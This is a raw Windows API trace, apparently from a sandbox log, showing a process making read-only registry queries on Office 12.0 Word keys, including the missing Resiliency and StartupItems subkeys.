[0085.283] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c92c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c92c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.284] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x0) returned 0x2
[0085.284] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c84c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c84c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.284] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x3bc) returned 0x0
[0085.284] RegQueryInfoKeyW (in: hKey=0x3bc, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c84c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c84c*=0xe, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.284] RegOpenKeyExW (in: hKey=0x3bc, lpSubKey="Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x3c0) returned 0x0
[0085.284] RegCloseKey (hKey=0x3bc) returned 0x0
[0085.284] RegQueryInfoKeyW (in: hKey=0x3c0, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c84c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c84c*=0x37, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.284] RegOpenKeyExW (in: hKey=0x3c0, lpSubKey="Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x3bc) returned 0x0
[0085.284] RegCloseKey (hKey=0x3c0) returned 0x0
[0085.284] RegQueryInfoKeyW (in: hKey=0x3bc, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c84c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c84c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.284] RegOpenKeyExW (in: hKey=0x3bc, lpSubKey="12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x3c0) returned 0x0
[0085.284] RegCloseKey (hKey=0x3bc) returned 0x0
[0085.284] RegQueryInfoKeyW (in: hKey=0x3c0, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c84c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c84c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.284] RegOpenKeyExW (in: hKey=0x3c0, lpSubKey="Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x3bc) returned 0x0
[0085.285] RegCloseKey (hKey=0x3c0) returned 0x0
[0085.285] RegQueryInfoKeyW (in: hKey=0x3bc, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c84c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c84c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.285] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x0) returned 0x2
[0085.285] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c92c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c92c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.285] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x3c0) returned 0x0
[0085.285] RegQueryInfoKeyW (in: hKey=0x3c0, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c92c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c92c*=0xe, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.285] RegOpenKeyExW (in: hKey=0x3c0, lpSubKey="Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x3c4) returned 0x0
[0085.285] RegCloseKey (hKey=0x3c0) returned 0x0
[0085.285] RegQueryInfoKeyW (in: hKey=0x3c4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c92c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c92c*=0x37, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.285] RegOpenKeyExW (in: hKey=0x3c4, lpSubKey="Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x3c0) returned 0x0
[0085.285] RegCloseKey (hKey=0x3c4) returned 0x0
[0085.285] RegQueryInfoKeyW (in: hKey=0x3c0, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c92c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c92c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.285] RegOpenKeyExW (in: hKey=0x3c0, lpSubKey="12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x3c4) returned 0x0
[0085.285] RegCloseKey (hKey=0x3c0) returned 0x0
[0085.285] RegQueryInfoKeyW (in: hKey=0x3c4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c92c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c92c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.286] RegOpenKeyExW (in: hKey=0x3c4, lpSubKey="Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x3c0) returned 0x0
[0085.286] RegCloseKey (hKey=0x3c4) returned 0x0
[0085.286] RegQueryInfoKeyW (in: hKey=0x3c0, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c92c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c92c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.286] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\12.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x0) returned 0x2
[0085.286] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c92c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c92c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.286] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x3c4) returned 0x0
[0085.286] RegCloseKey (hKey=0x3c4) returned 0x0
[0085.286] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c948 | out: phkResult=0x1c81c948*=0x3c4) returned 0x0
[0085.286] RegCloseKey (hKey=0x3c4) returned 0x0
[0085.286] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c948 | out: phkResult=0x1c81c948*=0x3c4) returned 0x0
[0085.286] RegCloseKey (hKey=0x3c4) returned 0x0
[0085.286] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x3c4) returned 0x0
[0085.286] RegCloseKey (hKey=0x3c4) returned 0x0
[0085.286] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x3c4) returned 0x0
[0085.286] RegCloseKey (hKey=0x3c4) returned 0x0
[0085.287] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x3c4) returned 0x0
[0085.287] RegCloseKey (hKey=0x3c4) returned 0x0
[0085.287] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c948 | out: phkResult=0x1c81c948*=0x3c4) returned 0x0
[0085.287] RegCloseKey (hKey=0x3c4) returned 0x0
[0085.287] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c948 | out: phkResult=0x1c81c948*=0x3c4) returned 0x0
[0085.287] RegCloseKey (hKey=0x3c4) returned 0x0
[0085.287] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x3c4) returned 0x0
[0085.287] RegCloseKey (hKey=0x3c4) returned 0x0
[0085.287] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x3c4) returned 0x0
[0085.287] RegCloseKey (hKey=0x3c4) returned 0x0
[0085.287] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x3c4) returned 0x0
[0085.287] RegCloseKey (hKey=0x3c4) returned 0x0
[0085.287] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c948 | out: phkResult=0x1c81c948*=0x3c4) returned 0x0
[0085.288] RegCloseKey (hKey=0x3c4) returned 0x0
[0085.288] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c948 | out: phkResult=0x1c81c948*=0x3c4) returned 0x0
[0085.288] RegCloseKey (hKey=0x3c4) returned 0x0
[0085.288] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x3c4) returned 0x0
[0085.288] RegCloseKey (hKey=0x3c4) returned 0x0
[0085.288] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x3c4) returned 0x0
[0085.288] RegCloseKey (hKey=0x3c4) returned 0x0
[0085.288] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x3c4) returned 0x0
[0085.288] RegCloseKey (hKey=0x3c4) returned 0x0
[0085.288] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c948 | out: phkResult=0x1c81c948*=0x3c4) returned 0x0
[0085.288] RegCloseKey (hKey=0x3c4) returned 0x0
[0085.288] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c948 | out: phkResult=0x1c81c948*=0x3c4) returned 0x0
[0085.288] RegCloseKey (hKey=0x3c4) returned 0x0
[0085.288] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x3c4) returned 0x0
[0085.289] RegCloseKey (hKey=0x3c4) returned 0x0
[0085.289] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x3c4) returned 0x0
[0085.289] RegCloseKey (hKey=0x3c4) returned 0x0
[0085.289] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x3c4) returned 0x0
[0085.289] RegCloseKey (hKey=0x3c4) returned 0x0
[0085.289] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c948 | out: phkResult=0x1c81c948*=0x3c4) returned 0x0
[0085.289] RegCloseKey (hKey=0x3c4) returned 0x0
[0085.291] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd28 | out: phkResult=0x1c81cd28*=0x0) returned 0x2
[0085.291] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cc4c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cc48, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cc4c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cc48*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.291] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd28 | out: phkResult=0x1c81cd28*=0x3c4) returned 0x0
[0085.291] RegQueryInfoKeyW (in: hKey=0x3c4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cc4c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cc48, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cc4c*=0xe, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cc48*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.291] RegOpenKeyExW (in: hKey=0x3c4, lpSubKey="Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd28 | out: phkResult=0x1c81cd28*=0x3c8) returned 0x0
[0085.291] RegCloseKey (hKey=0x3c4) returned 0x0
[0085.291] RegQueryInfoKeyW (in: hKey=0x3c8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cc4c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cc48, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cc4c*=0x37, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cc48*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.292] RegOpenKeyExW (in: hKey=0x3c8, lpSubKey="Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd28 | out: phkResult=0x1c81cd28*=0x3c4) returned 0x0
[0085.292] RegCloseKey (hKey=0x3c8) returned 0x0
[0085.292] RegQueryInfoKeyW (in: hKey=0x3c4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cc4c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cc48, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cc4c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cc48*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.292] RegOpenKeyExW (in: hKey=0x3c4, lpSubKey="12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd28 | out: phkResult=0x1c81cd28*=0x3c8) returned 0x0
[0085.292] RegCloseKey (hKey=0x3c4) returned 0x0
[0085.292] RegQueryInfoKeyW (in: hKey=0x3c8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cc4c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cc48, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cc4c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cc48*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.292] RegOpenKeyExW (in: hKey=0x3c8, lpSubKey="Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd28 | out: phkResult=0x1c81cd28*=0x3c4) returned 0x0
[0085.292] RegCloseKey (hKey=0x3c8) returned 0x0
[0085.292] RegQueryInfoKeyW (in: hKey=0x3c4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cc4c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cc48, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cc4c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cc48*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.292] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ce08 | out: phkResult=0x1c81ce08*=0x0) returned 0x2
[0085.292] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cd2c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cd28, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cd2c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cd28*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.292] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ce08 | out: phkResult=0x1c81ce08*=0x3c8) returned 0x0
[0085.292] RegQueryInfoKeyW (in: hKey=0x3c8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cd2c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cd28, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cd2c*=0xe, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cd28*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.292] RegOpenKeyExW (in: hKey=0x3c8, lpSubKey="Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ce08 | out: phkResult=0x1c81ce08*=0x3cc) returned 0x0
[0085.292] RegCloseKey (hKey=0x3c8) returned 0x0
[0085.293] RegQueryInfoKeyW (in: hKey=0x3cc, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cd2c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cd28, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cd2c*=0x37, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cd28*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.293] RegOpenKeyExW (in: hKey=0x3cc, lpSubKey="Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ce08 | out: phkResult=0x1c81ce08*=0x3c8) returned 0x0
[0085.293] RegCloseKey (hKey=0x3cc) returned 0x0
